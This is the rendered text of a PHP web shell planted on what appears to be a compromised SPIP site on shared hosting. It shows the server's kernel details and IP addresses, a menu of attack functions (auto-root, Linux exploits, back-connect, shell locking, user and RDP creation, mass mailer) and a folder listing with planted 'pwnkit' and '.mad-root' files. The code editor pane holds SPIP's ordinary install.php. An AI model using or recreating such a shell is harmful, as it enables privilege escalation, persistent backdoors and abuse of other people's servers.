Linux webm008.cluster115.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.115.20.8 | : 216.73.216.59
Cant Read [ /etc/named.conf ]
8.1.34
quelfutuu
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
quelfutuu /
www /
grice /
ecrire /
exec /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
403.php
1.89
KB
-rw----r--
404.php
1.56
KB
-rw----r--
admin_plugin.php
9.12
KB
-rw----r--
base_delete_all.php
1.69
KB
-rw----r--
base_repair.php
1.61
KB
-rw----r--
demande_mise_a_jour.php
2.34
KB
-rw----r--
fond.php
2.37
KB
-rw----r--
index.php
2
B
-rw----r--
info_plugin.php
1.06
KB
-rw----r--
informer.php
1.36
KB
-rw----r--
install.php
1.93
KB
-rw----r--
plonger.php
1.39
KB
-rw----r--
puce_statut.php
2.19
KB
-rw----r--
pwnkit
0
B
-rwxr-xr-x
rechercher.php
4.7
KB
-rw----r--
selectionner.php
1.36
KB
-rw----r--
upgrade.php
3.06
KB
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : install.php
<?php /***************************************************************************\ * SPIP, Système de publication pour l'internet * * * * Copyright © avec tendresse depuis 2001 * * Arnaud Martin, Antoine Pitrou, Philippe Rivière, Emmanuel Saint-James * * * * Ce programme est un logiciel libre distribué sous licence GNU/GPL. * \***************************************************************************/ /** * Affichage des étapes d'installation de SPIP * * @package SPIP\Core\Exec */ if (!defined('_ECRIRE_INC_VERSION')) { return; } include_spip('inc/minipres'); include_spip('inc/install'); include_spip('inc/autoriser'); define('_ECRIRE_INSTALL', '1'); define('_FILE_TMP', '_install'); /** * Affiche un des écrans d'installation de SPIP * * Affiche l'étape d'installation en cours, en fonction du paramètre * d'url `etape` * * @uses inc_auth_dist() * @uses verifier_visiteur() * * @uses install_etape__dist() * Affiche l'écran d'accueil de l'installation, * si aucune étape n'est encore définie. * **/ function exec_install_dist() { $etape = _request('etape'); $deja = (_FILE_CONNECT and analyse_fichier_connection(_FILE_CONNECT)); // Si deja installe, on n'a plus le droit qu'a l'etape chmod // pour chgt post-install ou aux etapes supplementaires // de declaration de base externes. // Mais alors il faut authentifier car ecrire/index.php l'a omis if ($deja and in_array($etape, ['chmod', 'sup1', 'sup2'])) { $auth = charger_fonction('auth', 'inc'); if (!$auth()) { verifier_visiteur(); $deja = (!autoriser('configurer')); } } if ($deja) { // Rien a faire ici echo minipres(); } else { include_spip('base/create'); $fonc = charger_fonction("etape_$etape", 'install'); $fonc(); } }
Close